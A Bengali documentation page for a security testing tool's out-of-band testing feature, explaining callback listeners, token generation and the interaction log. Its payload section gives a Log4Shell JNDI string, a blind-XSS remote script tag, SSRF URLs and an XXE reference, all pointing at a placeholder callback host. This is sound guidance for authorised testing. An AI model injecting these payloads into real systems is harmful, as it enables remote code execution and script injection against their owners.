---
url: https://docs.ogmabox.com/bn/app/utilities/oast.md
description: Ogma-তে আউট-অব-ব্যান্ড অ্যাপ্লিকেশন নিরাপত্তা পরীক্ষার কলব্যাক কনফিগার করুন।
---

# OAST {#oast}

OAST (Out-of-Band Application Security Testing) এমন দুর্বলতা শনাক্ত করে যার দৃশ্যমান উত্তর পাওয়া যায় না। পরিবর্তে লক্ষ্য আপনার নিয়ন্ত্রিত লিসেনারের সঙ্গে বহির্মুখী সংযোগ করে, যা সমস্যাটি নিশ্চিত করে।

## যেভাবে কাজ করে {#how-it-works}

Ogma একাধিক প্রোটোকলে স্থানীয় লিসেনার চালায়। লক্ষ্য অ্যাপ্লিকেশন কোনো লিসেনারে যোগাযোগ করলে উৎস IP, টাইমস্ট্যাম্প, প্রাপ্ত তথ্য ও ইনজেক্ট করা টোকেনসহ যোগাযোগটি রেকর্ড করা হয়।

### লিসেনারের প্রোটোকল {#listener-protocols}

| প্রোটোকল | ডিফল্ট পোর্ট | ব্যবহারের ক্ষেত্র |
|---|---|---|
| HTTP | কনফিগারযোগ্য | SSRF, ব্লাইন্ড XSS, ওয়েবহুক |
| HTTPS | কনফিগারযোগ্য | TLS-এর মাধ্যমে SSRF |
| DNS | কনফিগারযোগ্য | ব্লাইন্ড ইনজেকশন, XXE, log4shell |
| SMTP | কনফিগারযোগ্য | ইমেইল হেডার ইনজেকশন, মেইল সেবায় SSRF |

OAST সেটিংস প্যানেলে লিসেনারের পোর্ট এবং তৈরি টোকেনে ব্যবহৃত ডোমেইন নাম নির্ধারণ করুন।

## কলব্যাক টোকেন তৈরি {#generating-a-callback-token}

1. **সহায়ক সরঞ্জাম > OAST** খুলুন।
2. **+ নতুন** খুলে **তৈরি করুন** চাপুন। প্রতিটি পরীক্ষার টোকেন অনন্য।
3. টোকেন কপি করুন। এতে লিসেনারের ডোমেইন ও অনন্য শনাক্তকারী থাকে, যাতে যোগাযোগকে নির্দিষ্ট পরীক্ষার সঙ্গে মেলানো যায়।

টোকেনের বিন্যাসের উদাহরণ: `[unique-id].[your-oast-domain]`

## পেলোডে টোকেন ব্যবহার {#using-tokens-in-payloads}

অ্যাপ্লিকেশন বহির্মুখী সংযোগ করতে পারে এমন যেকোনো ফিল্ডে কলব্যাক টোকেন ইনজেক্ট করুন:

* **SSRF** - লক্ষ্য URL হিসেবে HTTP/HTTPS টোকেন ব্যবহার করুন: `https://[token]/`
* **XXE** - DOCTYPE বা বাহ্যিক এনটিটির URL-এ টোকেনের উল্লেখ করুন।
* **Log4Shell** - হেডারে যুক্ত করুন: `${jndi:ldap://[token]/a}`
* **ব্লাইন্ড XSS** - স্ক্রিপ্টের src হিসেবে ইনজেক্ট করুন: `<script src="https://[token]/x.js"></script>`
* **SMTP ইনজেকশন** - ইমেইল হেডারে গন্তব্য ঠিকানা বা URL হিসেবে ব্যবহার করুন।

## যোগাযোগের লগ {#interactions-log}

যোগাযোগ প্যানেলে প্রাপ্ত প্রতিটি কলব্যাক দেখা যায়:

| কলাম | বর্ণনা |
|---|---|
| সময় | যোগাযোগ কখন এসেছে |
| প্রোটোকল | HTTP, HTTPS, DNS বা SMTP |
| উৎস IP | সংযোগকারী IP ঠিকানা |
| টোকেন | যে টোকেনে যোগাযোগ করা হয়েছে |
| তথ্য | অনুরোধের পাথ, DNS কোয়েরির নাম বা SMTP তথ্য |

যেকোনো সারিতে ক্লিক করলে যোগাযোগের সম্পূর্ণ বিবরণ দেখা যায়। প্রযোজ্য ক্ষেত্রে অনুরোধের হেডার ও বডিও অন্তর্ভুক্ত থাকে।

## পরীক্ষার সঙ্গে যোগাযোগ মেলানো {#matching-interactions-to-tests}

প্রতিটি টোকেন অনন্য হওয়ায় বিভিন্ন প্যারামিটার বা অনুরোধে আলাদা টোকেন ইনজেক্ট করে ঠিক কোন ইনজেকশন পয়েন্ট কলব্যাক ঘটিয়েছে, তা নির্ধারণ করতে পারেন।

## সম্পর্কিত পৃষ্ঠা {#related-pages}

* [স্ক্যানার](./scanner.md)
* [পর্যবেক্ষণ](../findings.md) (নিরাপত্তা পরীক্ষার ফলাফল)
